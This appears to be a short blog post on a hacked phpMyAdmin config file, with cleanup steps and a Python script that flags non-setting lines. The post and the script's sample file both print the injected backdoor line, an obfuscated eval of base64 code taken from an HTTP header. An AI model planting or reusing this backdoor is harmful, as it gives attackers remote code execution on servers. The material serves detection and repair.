On one of my slices, my phpMyAdmin shows a blank page every so often. This is caused by a remote code execution exploit. You’re getting hacked, but don’t be scared.
The bug/hack is a single line in the file /var/lib/phpmyadmin/config.inc.php, which was corrupted.
Here is the whole file:
<?php
/*
* Generated configuration file
* Version: $Id: setup.php,v 1.23.2.8.2.2 2006/05/15 07:57:09 nijel Exp $
* Date: Fri, 14 Aug 2009 14:24:39 GMT
*/
/* Servers configuration */
$i = 0;
/* Server (config:root) [1] */
*$cfg['Servers'][$i]['xxx'];$z='bas'.'e64_dec'.'ode';eval($z($_SERVER['HTTP_X_CODE']));exit;#'] = 'yyy';
/* End of servers configuration */
To fix this issue, shell into Ubuntu and sudo up.
Look for the line //*$cfg['Servers'][$i]['xxx'];$z='bas'.'e64_dec'.'ode';eval($z($_SERVER['HTTP_X_CODE']));exit;#'] = 'yyy';
Comment it out with //.
Hit Ctrl+X, press Y, and let's reload Apache.
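A way to find such a line without knowing its text, as an added example that is not part of the original post: the injected line builds base64_decode from three fragments, so searching for that name finds nothing, while a check that reports every line that is not a plain setting still catches it. The accepted line shapes, the function name and the sample file are assumptions made for this example.

```python
import re

# Assumed shapes of a setup-generated config line: a lone PHP tag, the server
# counter, or one $cfg[...] assignment of a single-quoted string, int or bool.
# Arrays and double-quoted strings are deliberately not accepted, so a
# hand-edited config may need a manual look at what gets reported.
ALLOWED = re.compile(r"""
      <\?php | \?>
    | \$i \s* (?: = \s* 0 | \+\+ ) \s* ;
    | \$cfg (?: \[ (?: \$i | '[A-Za-z0-9_]+' ) \] )+ \s* = \s*
      (?: '(?:[^'\\]|\\.)*' | \d+ | true | false ) \s* ;
""", re.VERBOSE | re.IGNORECASE)


def suspicious_lines(php_source):
    """Return [(line_number, text)] for every line that is not a plain setting."""
    findings, in_comment = [], False
    for number, line in enumerate(php_source.splitlines(), 1):
        text = line.strip()
        if in_comment or text.startswith("/*"):
            # Block comments count only as whole lines: nothing may follow "*/".
            body = text if in_comment else text[2:]
            _, closed, tail = body.partition("*/")
            in_comment = not closed
            if tail.strip():
                findings.append((number, line))
        elif not text or ALLOWED.fullmatch(text):
            continue
        elif text.startswith(("//", "#")) and "?>" not in text:
            continue  # "?>" would end both the comment and PHP mode
        else:
            findings.append((number, line))
    return findings


# Constructed sample file; line 9 is the corrupted line shown on this page.
SAMPLE = """<?php
/*
 * Generated configuration file
 */
/* Servers configuration */
$i = 0;
/* Server (config:root) [1] */
$cfg['Servers'][$i]['host'] = 'localhost';
*$cfg['Servers'][$i]['xxx'];$z='bas'.'e64_dec'.'ode';eval($z($_SERVER['HTTP_X_CODE']));exit;#'] = 'yyy';
/* End of servers configuration */
"""
```

To check the live file, pass it the contents of /var/lib/phpmyadmin/config.inc.php; an empty list means every line is a comment or a plain setting.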
To avoid this problem:
- Avoid using phpmyadmin.yoursite.com or yoursite.com/phpmyadmin
- Use .htaccess passwords on the phpMyAdmin directory